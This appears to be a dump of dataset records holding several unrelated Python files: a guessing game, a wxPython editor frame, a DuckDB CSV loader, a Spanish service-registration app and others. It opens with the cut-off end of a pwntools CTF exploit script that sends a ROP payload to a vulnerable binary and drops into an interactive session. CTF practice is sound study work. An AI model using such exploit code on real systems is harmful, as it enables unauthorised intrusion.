p64(vuln)\nio.recvuntil(\"story!\\n\")\nio.sendline(payload)\n\nio.interactive()","repo_name":"yqw1212/yqw1212.github.io","sub_path":"exercises/2021-08-01-bjdctf_2020_babyrop2/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8965305753","text":"# High-Low Game\n# Date Created: 5/24/20\n# Last Modified: 5/24/20\n\nimport random\n\n\ndef game_num():\n \"\"\"\n return a random number for gameplay\n :return: int between 1-100\n \"\"\"\n return random.randint(1, 100)\n\n\ndef main():\n guess = 0\n ct = 0\n\n print(\"Welcome to the High Low Game!!!\")\n print(\"Computer is guessing...\")\n goal = game_num()\n\n while guess != goal:\n guess = int(input(\"Enter a integer between 1-100: \"))\n\n if guess < 0:\n print(\"No negative numbers\")\n elif guess > 100:\n print(\"No numbers above 100\")\n elif guess > goal:\n print(\"Too high!\")\n ct += 1\n elif guess < goal:\n print(\"Too low!\")\n ct += 1\n\n print(\"\\nYou guessed it!\")\n print(\"Number of Guesses = \", ct)\n\n\nmain()\n","repo_name":"NarishSingh/Python-3-Projects","sub_path":"hilowgame/hiLow.py","file_name":"hiLow.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"31707275918","text":"import threading\n\nfrom util.Utils import *\nfrom view.Notepad import Notepad\nfrom view.new_circuit.CircuitStd import CircuitStd, CircuitStd_\nfrom view.old_circuit.Circuit import Circuit\n\n[wxID_EDITORFRAME, wxID_EDITORFRAMESTATUSBAR, wxID_EDITORFRAMETABS,\n wxID_EDITORFRAMETABSSPLITTER, wxID_EDITORFRAMETOOLBAR,\n] = [wx.NewId() for _init_ctrls in range(5)]\n\n(wxID_EDITOROPEN, wxID_EDITORSAVE, wxID_EDITORSAVEAS, wxID_EDITORCLOSEPAGE,\n wxID_EDITORREFRESH, wxID_EDITORDESIGNER, wxID_EDITORDEBUG, wxID_EDITORHELP,\n wxID_DEFAULTVIEWS, wxID_EDITORSWITCHTO, wxID_EDITORDIFF, wxID_EDITORPATCH,\n wxID_EDITORTOGGLEVIEW, wxID_EDITORSWITCHEXPLORER, wxID_EDITORSWITCHSHELL,\n wxID_EDITORSWITCHPALETTE, wxID_EDITORSWITCHINSPECTOR,\n 
wxID_EDITORTOGGLERO, wxID_EDITORHELPFIND, wxID_EDITORRELOAD,\n wxID_EDITORHELPABOUT, wxID_EDITORHELPGUIDE, wxID_EDITORHELPTIPS,\n wxID_EDITORHELPOPENEX,\n wxID_EDITORPREVPAGE, wxID_EDITORNEXTPAGE,\n wxID_EDITORBROWSEFWD, wxID_EDITORBROWSEBACK,\n wxID_EDITOREXITBOA, wxID_EDITOROPENRECENT,\n wxID_EDITORHIDEPALETTE, wxID_EDITORWINDIMS, wxID_EDITORWINDIMSLOAD,\n wxID_EDITORWINDIMSSAVE, wxID_EDITORWINDIMSRESDEFS,\n wxID_EDITORSWITCHPREFS,\n) = [wx.NewId() for x in range(36)]\n\nsuSocketFileOpenServer = True\n\nkeyDefs = {\n#--Source View------------------------------------------------------------------\n 'Refresh' : (wx.ACCEL_CTRL, ord('R'), 'Ctrl-R'),\n 'Find' : (wx.ACCEL_CTRL, ord('F'), 'Ctrl-F'),\n 'FindAgain' : (wx.ACCEL_NORMAL, wx.WXK_F3, 'F3'),\n 'FindAgainPrev' : (wx.ACCEL_SHIFT, wx.WXK_F3, 'Shift-F3'),\n 'ToggleBrk' : (wx.ACCEL_NORMAL, wx.WXK_F5, 'F5'),\n 'Indent' : (wx.ACCEL_CTRL, ord('I'), 'Ctrl-I'),\n 'Dedent' : (wx.ACCEL_CTRL, ord('U'), 'Ctrl-U'),\n 'Comment' : (wx.ACCEL_ALT, ord('3'), 'Alt-3'),\n 'Uncomment' : (wx.ACCEL_ALT, ord('4'), 'Alt-4'),\n 'DashLine' : (wx.ACCEL_CTRL, ord('B'), 'Ctrl-B'),\n 'MarkPlace' : (wx.ACCEL_CTRL, ord('M'), 'Ctrl-M'),\n 'CodeComplete': (wx.ACCEL_CTRL, wx.WXK_SPACE, 'Ctrl-Space'),\n 'CallTips' : (wx.ACCEL_SHIFT|wx.ACCEL_CTRL, wx.WXK_SPACE, 'Ctrl-Shift-Space'),\n 'CodeXform' : (wx.ACCEL_ALT, ord('C'), 'Alt-C'),\n 'BrowseTo' : (wx.ACCEL_CTRL, wx.WXK_RETURN, 'Ctrl-Return'),\n 'BrowseFwd' : (wx.ACCEL_SHIFT|wx.ACCEL_CTRL, ord('K'), 'Ctrl-K'),\n 'BrowseBack' : (wx.ACCEL_SHIFT|wx.ACCEL_CTRL, ord('J'), 'Ctrl-J'),\n#-Modules-----------------------------------------------------------------------\n 'RunApp' : (wx.ACCEL_NORMAL, wx.WXK_F9, 'F9'),\n 'RunMod' : (wx.ACCEL_NORMAL, wx.WXK_F10, 'F10'),\n 'Close' : (wx.ACCEL_CTRL, ord('W'), 'Ctrl-W'),\n 'Save' : (wx.ACCEL_CTRL, ord('S'), 'Ctrl-S'),\n 'SaveAs' : (wx.ACCEL_ALT, ord('S'), 'Alt-S'),\n 'CheckSource' : (wx.ACCEL_NORMAL, wx.WXK_F2, 'F2'),\n 'Debug' : (wx.ACCEL_NORMAL, wx.WXK_F4, 'F4'),\n 'DebugOut' : (wx.ACCEL_NORMAL, wx.WXK_F6, 'F6'),\n 'DebugStep' : (wx.ACCEL_NORMAL, wx.WXK_F7, 'F7'),\n 'DebugOver' : (wx.ACCEL_NORMAL, wx.WXK_F8, 'F8'),\n 'DebugPause' : (wx.ACCEL_SHIFT, wx.WXK_F4, 'Shift-F4'),\n 'DebugStop' : (wx.ACCEL_CTRL|wx.ACCEL_SHIFT, wx.WXK_F4, 'Ctrl-Shift-F4'),\n 'SwitchToApp' : (wx.ACCEL_ALT, ord('A'), 'Alt-A'),\n#--General----------------------------------------------------------------------\n 'ContextHelp' : (wx.ACCEL_NORMAL, wx.WXK_F1, 'F1'),\n 'Open' : (wx.ACCEL_CTRL, ord('O'), 'Ctrl-O'),\n 'Insert' : (wx.ACCEL_NORMAL, wx.WXK_INSERT, 'Ins'),\n 'Delete' : (wx.ACCEL_NORMAL, wx.WXK_DELETE, 'Del'),\n 'Escape' : (wx.ACCEL_NORMAL, wx.WXK_ESCAPE, 'Esc'),\n 'NextPage' : (wx.ACCEL_CTRL, ord('K'), 'Ctrl-K'),\n 'PrevPage' : (wx.ACCEL_CTRL, ord('J'), 'Ctrl-J'),\n 'Inspector' : (wx.ACCEL_NORMAL, wx.WXK_F11, 'F11'),\n 'Designer' : (wx.ACCEL_NORMAL, wx.WXK_F12, 'F12'),\n 'Editor' : (wx.ACCEL_NORMAL, wx.WXK_F12, 'F12'),\n 'GotoLine' : (wx.ACCEL_CTRL, ord('G'), 'Ctrl-G'),\n 'HelpFind' : (wx.ACCEL_CTRL, ord('H'), 'Ctrl-H'),\n 'GotoExplorer': (wx.ACCEL_CTRL, ord('E'), 'Ctrl-E'),\n 'GotoShell' : (wx.ACCEL_CTRL, ord('P'), 'Ctrl-P'),\n 'CloseView' : (wx.ACCEL_CTRL, ord('Q'), 'Ctrl-Q'),\n#--Clipboard--------------------------------------------------------------------\n 'Cut' : (wx.ACCEL_SHIFT, wx.WXK_DELETE, 'Shift-Del'),\n 'Copy' : (wx.ACCEL_CTRL, wx.WXK_INSERT, 'Ctrl-Ins'),\n 'Paste' : (wx.ACCEL_SHIFT, wx.WXK_INSERT, 'Shift-Ins'),\n#--Designer---------------------------------------------------------------------\n 
'MoveLeft' : (wx.ACCEL_CTRL, wx.WXK_LEFT, 'Ctrl-Left'),\n 'MoveRight' : (wx.ACCEL_CTRL, wx.WXK_RIGHT, 'Ctrl-Right'),\n 'MoveUp' : (wx.ACCEL_CTRL, wx.WXK_UP, 'Ctrl-Up'),\n 'MoveDown' : (wx.ACCEL_CTRL, wx.WXK_DOWN, 'Ctrl-Down'),\n 'WidthDec' : (wx.ACCEL_SHIFT, wx.WXK_LEFT, 'Shift-Left'),\n 'WidthInc' : (wx.ACCEL_SHIFT, wx.WXK_RIGHT, 'Shift-Right'),\n 'HeightInc' : (wx.ACCEL_SHIFT, wx.WXK_DOWN, 'Shift-Down'),\n 'HeightDec' : (wx.ACCEL_SHIFT, wx.WXK_UP, 'Shift-Up'),\n 'SelectLeft' : (wx.ACCEL_NORMAL, wx.WXK_LEFT, 'Left'),\n 'SelectRight' : (wx.ACCEL_NORMAL, wx.WXK_RIGHT, 'Right'),\n 'SelectDown' : (wx.ACCEL_NORMAL, wx.WXK_DOWN, 'Down'),\n 'SelectUp' : (wx.ACCEL_NORMAL, wx.WXK_UP, 'Up'),\n#--Shell------------------------------------------------------------------------\n 'HistoryUp' : (wx.ACCEL_CTRL, wx.WXK_UP, 'Ctrl-Up'),\n 'HistoryDown' : (wx.ACCEL_CTRL, wx.WXK_DOWN, 'Ctrl-Down'),\n}\n\ndef socketFileOpenServerListen(editor):\n # self.closed, self.listener = socketFileOpenServerListen(self)\n closed = threading.Event()\n listener = Listener(editor, closed)\n listener.start()\n return closed, listener\n\n\nsocketPort = 50007\nselectTimeout = 0.25\nclass Listener(threading.Thread):\n def __init__(self, editor, closed):\n #self.queue = queue\n self.editor = editor\n self.closed = closed\n threading.Thread.__init__(self)\n\n def run(self, host='127.0.0.1', port=socketPort):\n import socket\n from select import select\n # Open a socket and listen.\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.bind((host, port))\n except socket.error as err:\n self.closed.set()\n return\n\n s.listen(5)\n while 1:\n while 1:\n # Listen for 0.25 s, then check if closed is set. In that case,\n # end thread by returning.\n ready, dummy, dummy = select([s],[],[], selectTimeout)\n if self.closed.isSet():\n return\n if ready:\n break\n\n # Accept a connection, read the data and put it into the queue.\n conn, addr = s.accept()\n l = []\n while 1:\n data = conn.recv(1024)\n if not data: break\n l.append(data)\n name = ''.join(l)\n if name.strip():\n wx.CallAfter(self.editor.openOrGotoModule, name)\n conn.close()\n\n\nclass Editor(wx.MDIChildFrame):\n \"\"\" Source code editor and host for the Model/View/Controller classes\"\"\"\n\n editorTitle = 'Editor'\n editorIcon = '../Images/Icons/Editor.ico'\n\n openBmp = 'Images/Editor/Open.png'\n backBmp = '../Images/Shared/Previous.png'\n forwBmp = '../Images/Shared/Next.png'\n recentBmp = 'Images/Editor/RecentFiles.png'\n helpBmp = '../Images/Shared/Help.png'\n helpIdxBmp = '../Images/Shared/CustomHelp.png'\n ctxHelpBmp = 'Images/Shared/ContextHelp.png'\n tipBmp = '../Images/Shared/Tip.png'\n aboutBmp = '../Images/Shared/About.png'\n shellBmp = 'Images/Editor/Shell.png'\n explBmp = '../Images/Editor/Explorer.png'\n inspBmp = '../Images/Shared/Inspector.png'\n paletteBmp = '../Images/Shared/Palette.png'\n prefsBmp = '../Images/Modules/PrefsFolder.png'\n\n\n def setDefaultSize(self):\n paletteHeight = 120\n editorScreenWidthPerc = 0.73\n screenX, screenY, screenWidth, screenHeight = wx.GetClientDisplayRect()\n # edWidth = int(screenWidth * editorScreenWidthPerc)\n edWidth = screenWidth\n inspWidth = screenWidth - edWidth + 1\n underPalette = paletteHeight + screenY\n bottomHeight = screenHeight - paletteHeight - 65\n windowManagerSide = 5\n left = inspWidth + windowManagerSide*2 + screenX - 10\n self.SetSize(0, underPalette + screenY,\n edWidth, bottomHeight)\n\n def __init__(self, parent, gateMediator, quantum_computer):\n\n 
wx.MDIChildFrame.__init__(self,name='', parent=parent,\n pos=wx.Point(68, 72), size=wx.Size(810, 515),\n style=wx.SIMPLE_BORDER)\n self.gateMediator = gateMediator\n gateMediator.set_editor(self)\n self.setDefaultSize()\n self.modelImageList = wx.ImageList(height=16, width=16)\n self.blankEditMenu = wx.Menu(title='')\n self.blankViewMenu = wx.Menu(title='')\n self.helpMenu = wx.Menu(title='')\n self.toolsMenu = wx.Menu(title='')\n\n self.mainMenu = wx.MenuBar()\n self.mainMenu.Append(menu=wx.Menu(), title='File')\n self.mainMenu.Append(menu=wx.Menu(), title='Edit')\n self.mainMenu.Append(menu=wx.Menu(), title='Views')\n self.mainMenu.Append(menu=self.toolsMenu, title='Tools')\n self.SetMenuBar(self.mainMenu)\n\n self.statusBar = EditorStatusBar(id=wxID_EDITORFRAMESTATUSBAR,\n name='statusBar', parent=self, style=0)\n\n # self.toolBar = EditorToolBar(id=wxID_EDITORFRAMETOOLBAR, name='toolBar',\n # parent=self, pos=wx.Point(0, 0), size=wx.Size(802, 250),\n # style=wx.TB_HORIZONTAL | wx.NO_BORDER)\n\n self.tabs = wx.Notebook(id=wxID_EDITORFRAMETABS, name='tabs',\n parent=self, pos=wx.Point(2, 2), size=wx.Size(798,\n 417), style=wx.CLIP_CHILDREN)\n\n self.tabs.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED,\n self.OnTabsNotebookPageChanged, id=wxID_EDITORFRAMETABS)\n\n\n self.SetStatusBar(self.statusBar)\n # self.SetToolBar(self.toolBar)\n self.SetIcon(wx.Icon(self.editorIcon))\n\n self.toolAccels = []\n self.tools = {}\n self.numFixedPages = 0\n\n # Explorer\n self.circuitStd = self.addExplorerPage('Circuit Builder', gateMediator=gateMediator, Page=CircuitStd_, quantum_computer=quantum_computer)\n self.notepad = self.addExplorerPage('Code Editor', gateMediator=gateMediator, Page=Notepad, quantum_computer=quantum_computer)\n # self.circuit = self.addExplorerPage('Circuit', gateMediator, Page=Circuit)\n\n self.winDimsMenu = wx.Menu()\n self.winDimsMenu.Append(wxID_EDITORWINDIMSLOAD, 'Load',\n 'Load window dimensions from the config.')\n self.winDimsMenu.Append(wxID_EDITORWINDIMSSAVE, 'Save',\n 'Save window dimensions to the config.')\n self.winDimsMenu.Append(wxID_EDITORWINDIMSRESDEFS,\n 'Restore defaults', 'Restore dimensions to defaults')\n\n self.winMenu =wx.Menu()\n appendMenuItem(self.winMenu, wxID_EDITORSWITCHPALETTE,\n 'Palette', '', self.paletteBmp, 'Switch to the Palette frame.')\n appendMenuItem(self.winMenu, wxID_EDITORSWITCHINSPECTOR,\n 'Inspector', keyDefs['Inspector'], self.inspBmp,\n 'Switch to the Inspector frame.')\n self.winMenu.AppendSeparator()\n\n appendMenuItem(self.winMenu, wxID_EDITORBROWSEBACK,\n 'Browse back', (), self.backBmp, #\\t%s'%keyDefs['BrowseBack'][2],\n 'Go back in browsing history stack')\n appendMenuItem(self.winMenu, wxID_EDITORBROWSEFWD,\n 'Browse forward', (), self.forwBmp, #\\t%s'%keyDefs['BrowseFwd'][2],\n 'Go forward in browsing history stack')\n appendMenuItem(self.winMenu, wxID_EDITORPREVPAGE,\n 'Previous page', keyDefs['PrevPage'], '-',\n 'Switch to the previous page of the main notebook')\n appendMenuItem(self.winMenu, wxID_EDITORNEXTPAGE,\n 'Next page', keyDefs['NextPage'], '-',\n 'Switch to the next page of the main notebook')\n self.winMenu.AppendSeparator()\n self.winMenu.Append(wxID_EDITORWINDIMS,\n 'All window dimensions', self.winDimsMenu,\n 'Load, save or restore IDE windows dimensions')\n self.winMenu.Append(wxID_EDITORHIDEPALETTE,\n 'Hide Palette', 'Hide the Palette frame')\n self.winMenu.AppendSeparator()\n self.mainMenu.Append(self.winMenu, 'Windows')\n\n # Help menu\n appendMenuItem(self.helpMenu, wxID_EDITORHELP, 'Help',\n (), self.helpBmp, 
'Opens help for the Editor')\n self.helpMenu.Append(wxID_EDITORHELPGUIDE,\n 'Getting started guide', 'Opens the Getting started guide')\n self.helpMenu.AppendSeparator()\n appendMenuItem(self.helpMenu, wxID_EDITORHELPFIND,\n 'Find in index...', keyDefs['HelpFind'], self.helpIdxBmp,\n 'Pops up a text input for starting a search of the help indexes')\n self.helpMenu.Append(wxID_EDITORHELPOPENEX, 'Open an example...',\n 'Opens file dialog in the Examples directory')\n appendMenuItem(self.helpMenu, wxID_EDITORHELPTIPS,\n 'Tips', (), self.tipBmp, 'Opens the \"Tip of the Day\" window')\n self.helpMenu.AppendSeparator()\n appendMenuItem(self.helpMenu, wxID_EDITORHELPABOUT,\n 'About', (), self.aboutBmp, 'Opens the About box')\n\n helpMenuTitleName = 'Help'\n self.mainMenu.Append(self.helpMenu, helpMenuTitleName)\n\n # create initial toolbar buttons and menus\n dt = FileDropTarget(self)\n self.SetDropTarget(dt)\n\n self.tabs.SetMinSize(wx.DefaultSize)\n\n def switch_to_circuit_view(self):\n self.tabs.SetSelection(0)\n\n def switch_to_notepad_view(self):\n self.tabs.SetSelection(1)\n\n def stimula(self, shouldStimulate, gate = None):\n self.circuitStd.stimula(shouldStimulate, gate)\n\n\n def OnTabsNotebookPageChanged(self, ev):\n pass\n\n\n def OnHelpToolClick(self, ev):\n pass\n\n def OnWxWinHelpToolClick(self, ev):\n pass\n\n def OnPythonHelpToolClick(self, ev):\n pass\n\n def addExplorerPage(self, name, gateMediator, Page, quantum_computer):\n explorerPage = Page(self.tabs, gateMediator, quantum_computer)\n self.tabs.AddPage(explorerPage, name, imageId=wx.NewId())\n self.numFixedPages += 1\n return explorerPage\n\n\nsbfIcon, sbfBrwsBtns, sbfStatus, sbfCrsInfo, sbfProgress = range(5)\n\nclass EditorStatusBar(wx.StatusBar):\n \"\"\" Displays information about the current view. Also global stats/\n progress bar etc. 
\"\"\"\n maxHistorySize = 250\n def __init__(self, *_args, **_kwargs):\n wx.StatusBar.__init__(self, _kwargs['parent'], _kwargs['id'], style=wx.STB_SIZEGRIP)\n self.SetFieldsCount(6)\n imgWidth = 16\n\n self.SetStatusWidths([imgWidth, 36, 400, 25, 150, -1])\n\n rect = self.GetFieldRect(sbfIcon)\n self.img = wx.StaticBitmap(self, -1,\n wx.Image('../Images/Shared/BoaLogo.png').ConvertToBitmap(),\n (rect.x+1, rect.y+1), (16, 16))\n\n rect = self.GetFieldRect(sbfBrwsBtns)\n self.historyBtnBack = wx.BitmapButton(self, -1,\n wx.Image('../Images/Shared/PreviousSmall.png').ConvertToBitmap(),\n (rect.x+1, rect.y+1), (int(round(rect.width/2.0))-1, rect.height-2))\n self.historyBtnFwd = wx.BitmapButton(self, -1,\n wx.Image('../Images/Shared/NextSmall.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap(),\n (rect.x+1+int(round(rect.width/2.0)), rect.y+1), (int(round(rect.width/2.0))-1, rect.height-2))\n\n tip = 'Browse the Traceback/Error/Output window history.'\n self.historyBtnBack.SetToolTip(tip)\n self.historyBtnFwd.SetToolTip(tip)\n\n self.erroutFrm = None\n\n self.progress = wx.Gauge(self, -1, 100)\n self.linkProgressToStatusBar()\n\n self.images = {'Info': wx.Image('../Images/Shared/Info.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap(),\n 'Warning': wx.Image('../Images/Shared/Warning.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap(),\n 'Error': wx.Image('../Images/Shared/Error.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap()}\n self.history = []\n self._histcnt = 0\n\n def linkProgressToStatusBar(self):\n rect = self.GetFieldRect(sbfProgress)\n self.progress.SetSize(rect.x+1, rect.y+1, rect.width -2, rect.height -2)\n\n\nclass EditorToolBar(wx.ToolBar):\n def __init__(self, *_args, **_kwargs):\n frame = _kwargs['parent']\n wx.ToolBar.__init__(self, frame, _kwargs['id'],\n style=wx.TB_HORIZONTAL | wx.NO_BORDER|wx.TB_FLAT)\n self.toolLst = []\n self.toolCount = 0\n self.SetToolBitmapSize((16, 16))\n AddToolButtonBmpObject(frame, self,wx.Image('../Images/Shared/Previous.png').ConvertToBitmap(), 'Python help', frame.OnPythonHelpToolClick)\n AddToolButtonBmpObject(frame, self,wx.Image('../Images/Shared/Next.png').ConvertToBitmap(), 'Python help', frame.OnPythonHelpToolClick)\n AddToolButtonBmpObject(frame, self,wx.Image('../Images/Shared/Delete.png').ConvertToBitmap(), 'Python help', frame.OnPythonHelpToolClick)\n AddToolButtonBmpObject(frame, self, wx.Image('../Images/Shared/Help.png').ConvertToBitmap(), 'Simulator or selected component help', frame.OnHelpToolClick)\n AddToolButtonBmpObject(frame, self, wx.Image('../Images/Shared/wxWinHelp.png').ConvertToBitmap(), 'wxPython help', frame.OnWxWinHelpToolClick)\n AddToolButtonBmpObject(frame, self,wx.Image('../Images/Shared/PythonHelp.png').ConvertToBitmap(), 'Python help', frame.OnPythonHelpToolClick)\n self.Realize()\n\n def AddSeparator(self):\n wx.ToolBar.AddSeparator(self)\n self.toolLst.append(-1)\n self.toolCount = self.toolCount + 1\n\n def DeleteTool(self, id):\n wx.ToolBar.DeleteTool(self, id)\n self.toolLst.remove(id)\n self.toolCount = self.toolCount - 1\n\n def ClearTools(self):\n posLst = range(self.toolCount)\n # posLst.reverse()\n for pos in posLst:\n self.DeleteToolByPos(pos)\n\n self.DisconnectToolIds()\n\n self.toolLst = []\n self.toolCount = 0\n\n def GetToolPopupPosition(self, id):\n margins = self.GetMargins() # self.GetToolMargins()\n toolSize = self.GetToolSize()\n xPos = margins.x\n for tId in self.toolLst:\n if tId == id:\n return wx.Point(xPos, margins.y + toolSize.y)\n\n if tId == -1:\n xPos = xPos + self.GetToolSeparation()\n else:\n xPos = xPos + 
toolSize.x\n\n return wx.Point(0, 0)\n\n def PopupToolMenu(self, toolId, menu):\n self.PopupMenu(menu, self.GetToolPopupPosition(toolId))\n\n def DisconnectToolIds(self):\n for wid in self.toolLst:\n if wid != -1:\n self.GetParent().Disconnect(wid)\n\n\nclass FileDropTarget(wx.FileDropTarget):\n def __init__(self, editor):\n wx.FileDropTarget.__init__(self)\n self.editor = editor\n\n def OnDropFiles(self, x, y, filenames):\n wx.BeginBusyCursor()\n try:\n for filename in filenames:\n # self.editor.openOrGotoModule(filename)\n print (filename)\n finally:\n wx.EndBusyCursor()\n return True","repo_name":"DarthThanatos/QuantumSimulator","sub_path":"view/Editor.py","file_name":"Editor.py","file_ext":"py","file_size_in_byte":19363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"931951629","text":"#Desafio 082: Crie um programa que vai ler vários números e colocar em uma lista. Depois disso, crie duas listas extras que vão conter apenas os valores pares e os valores impares digitados, respectivamente. Ao final, mostre o conteúdo dos três listas geradas.\n\n#RESOLUÇÃO PESSOAL\nlista = []\nimpares = []\npares = []\nwhile True:\n n = int(input('Digite um valor inteiro: '))\n lista.append(n)\n if n%2==0:\n pares.append(n)\n else: \n impares.append(n)\n\n quest = str(input('Quer continuar? [S/N] ')).strip().upper()\n if quest == 'N':\n break\n\nprint(f'Conjunto com os valores: {lista}')\nprint(f'Subconjunto com os valores impares: {impares}')\nprint(f'Subconjunto com os valores pares: {pares}')\n\n","repo_name":"gustavocamalionti/Curso-em-Video","sub_path":"back-end/python3/Mundo III/Desafios/82 - (Dividindo Valores em Várias Listas).py","file_name":"82 - (Dividindo Valores em Várias Listas).py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21927280578","text":"# MOVE THE TABLES FROM LANDING PERSISTANT TO FORMATTED\n# CHANGE THE FORMAT OF THE TABLES TO DUCKDB\n\n# import libraries\nimport sys\nimport os\nimport duckdb\n\ndef StoreLogPers(tbl, file):\n file.write(tbl + \"\\n\")\n\n\n# it stores the csv tables in the landing zone in a duckdb database\ndef ProcessCSV(Datasource, Connection, Files, LogWriter):\n\n id = Datasource[\"id\"]\n # csv delimiter\n delim = Datasource[\"delim\"] if \"delim\" in Datasource else \",\"\n \n for file in Files:\n tablename = file.split(\".\")[0]\n Connection.execute(f\"\"\"\n CREATE TABLE test_{tablename}\n AS SELECT * FROM read_csv_auto(\n './data/landing_pers/{id}/{file}',\n HEADER = TRUE,\n SAMPLE_SIZE=-1,\n DELIM = '{delim}'\n ) \n \"\"\")\n StoreLogPers(file, LogWriter)\n \n\ndef LandingPers2Formatted(Objects):\n\n # list of files already processed:\n processedFiles = []\n with open('logs/processed_data_persistant.txt', \"r\") as f0:\n for line in f0:\n processedFiles.append(line.rstrip())\n\n # open file to store logs in append mode\n f = open('logs/processed_data_persistant.txt', \"a\")\n\n # process datasets:\n for datasource in Objects:\n id = datasource[\"id\"]\n format = datasource[\"format\"]\n\n # files to process:\n files = [file for file in os.listdir(f'data/landing_pers/{id}') if not file in processedFiles]\n if len(files) == 0:\n continue\n\n # open database connection\n con = duckdb.connect(database=f\"data/formatted/db_{id}.db\", read_only=False)\n \n if format == \"csv\":\n ProcessCSV(datasource, con, files, f)\n #elif format == \"xlsx\":\n # ProcessXLSX(datasource, con, files, f)\n 
else:\n print(f\"Format {format} is not supported\\nSupported formats: csv\")\n\n # close database\n con.close()\n\n f.close()\n\n\nif __name__ == \"__main__\":\n sys.path.append('..')\n sys.path.append('.')\n from helper import *\n\n setwd()\n Objects = Objects()\n LandingPers2Formatted(Objects)\n","repo_name":"adriamd/ADSDB_project1","sub_path":"scripts/formatted.py","file_name":"formatted.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3567839416","text":"import re\n\n# tipo de dato que representa un servicio y que puede ser utilizado en el programa para almacenar y manipular información sobre un servicio.\nclass Servicio:\n def __init__(self, datos):\n #Metodo constructor->inicializa los valores de una instancia\n self.titulo = datos[\"titulo\"]\n self.descripcion = datos[\"descripcion\"]\n self.ubicacion = datos[\"ubicacion\"]\n self.precio = datos[\"precio\"]\n self.fecha_hora = datos[\"fecha_hora\"]\n self.tipo = datos[\"tipo\"]\n\n \nclass Interfaz:\n #MENU DEL SITIO WEB\n def mostrar_menu(self):\n menu = \"\"\"\n BIENVENIDO A TURISMO\n 1- Registrar servicio\n 2- Contratar servicio\n 3- Salir\n\n SELECCIONE UNA OPCION:\n \"\"\"\n self.opcion = input(menu)\n\n while self.opcion not in [\"1\", \"2\", \"3\"]:\n print(\"Opcion incorrecta\")\n self.opcion = input(menu)\n\n return self.opcion\n \n def registrar_servicio(self):\n print(\"Ingrese los siguientes datos:\")\n titulo = input(\"Título: \")\n descripcion = input(\"Descripción: \")\n ubicacion = input(\"Ubicación: \")\n\n precio = input(\"Precio: \")\n while not re.match(r'^\\d+(?:\\.\\d{1,2})?$', precio):\n print(\"Error: el precio debe ser un número válido con hasta dos decimales.\")\n precio = input(\"Precio: \")\n precio = float(precio)\n\n fecha_hora = input(\"Fecha y Hora (DD/MM/AAAA HH:MM): \")\n while not re.match(r'^\\d{2}/\\d{2}/\\d{4}\\s\\d{2}:\\d{2}$', fecha_hora):\n print(\"Error: la fecha y hora deben estar en el formato DD/MM/AAAA HH:MM.\")\n fecha_hora = input(\"Fecha y Hora (DD/MM/AAAA HH:MM): \")\n\n tipo = input(\"Tipo: \")\n\n # Comprobar que los campos obligatorios no estén en blanco\n if not titulo or not descripcion or not ubicacion or not tipo:\n print(\"Error: todos los campos son obligatorios.\")\n return self.registrar_servicio() # Volver a solicitar al usuario que ingrese los datos\n\n return {\"titulo\": titulo,\n \"descripcion\": descripcion,\n \"ubicacion\": ubicacion,\n \"precio\": precio,\n \"fecha_hora\": fecha_hora,\n \"tipo\": tipo}\n \n def mostrar_servicios(self, servicios):\n if not servicios:\n print(\"No hay servicios registrados\")\n else:\n print(\"\\n--------------------------------\")\n print(\"SERVICIOS DISPONIBLES\")\n for id_servicio, servicio in servicios.items():\n print(f\"ID: {id_servicio} - Título: {servicio.titulo} - Descripcion: {servicio.descripcion} - Precio: {servicio.precio} - Fecha y hora: {servicio.fecha_hora}\")\n print(\"--------------------------------\")\n\n\n\nclass Controller:\n def __init__(self):\n #Diccionario de servicios->BD\n self.servicios = {}\n #Instancia de la clase interfaz\n self.interfaz = Interfaz()\n\n def registrar_servicio(self):\n datos = self.interfaz.registrar_servicio()\n #objeto Servicio con los datos ingresados por el usuario\n servicio = Servicio(datos)\n\n # ALMACENAR SERVICIO EN LA BD\n #identificador único para el nuevo servicio\n id_servicio = len(self.servicios) + 1\n #agrega el nuevo servicio a la base de datos utilizando ese 
identificador único como clave.\n self.servicios[id_servicio] = servicio\n\n print(\"El servicio ha sido registrado con éxito\")\n\n def mostrar_servicios(self):\n self.interfaz.mostrar_servicios(self.servicios)\n\ndef main():\n #Instancias\n controller = Controller()\n interfaz = Interfaz()\n\n while True:\n opcion = interfaz.mostrar_menu()\n\n if opcion == \"1\":\n controller.registrar_servicio()\n elif opcion == \"2\":\n controller.mostrar_servicios()\n elif opcion == \"3\":\n break\n else:\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"Alvaro0219/Dis-de-sistemas","sub_path":"Diagnostico/RegistrarServicio/Registrar_servicio.py","file_name":"Registrar_servicio.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69885529733","text":"from typing import List\nfrom functools import lru_cache\n\n\ndef calcArea(s, e, h):\n return (e - s) * min(h[e], h[s])\n\n\nclass Solution:\n def maxArea(self, height: List[int]):\n length = len(height) - 1\n\n @lru_cache(None)\n def findMaxArea(start, end):\n if end <= start or start < 0 or end > length:\n return 0\n\n this_area = calcArea(start, end, height)\n prev_area = 0\n if height[end] > height[start]:\n prev_area = findMaxArea(start + 1, end)\n elif height[end] < height[start]:\n prev_area = findMaxArea(start, end - 1)\n else:\n prev_area = max(\n findMaxArea(start + 1, end), findMaxArea(start, end - 1)\n )\n return max(this_area, prev_area)\n\n return findMaxArea(0, length)\n\n\ns = Solution()\ni = [4, 3, 2, 1, 4]\no = s.maxArea(i)\n\nprint(o)","repo_name":"vincent-kk/Basic-Algorithm","sub_path":"03. DP/11. Container With Most Water.py","file_name":"11. 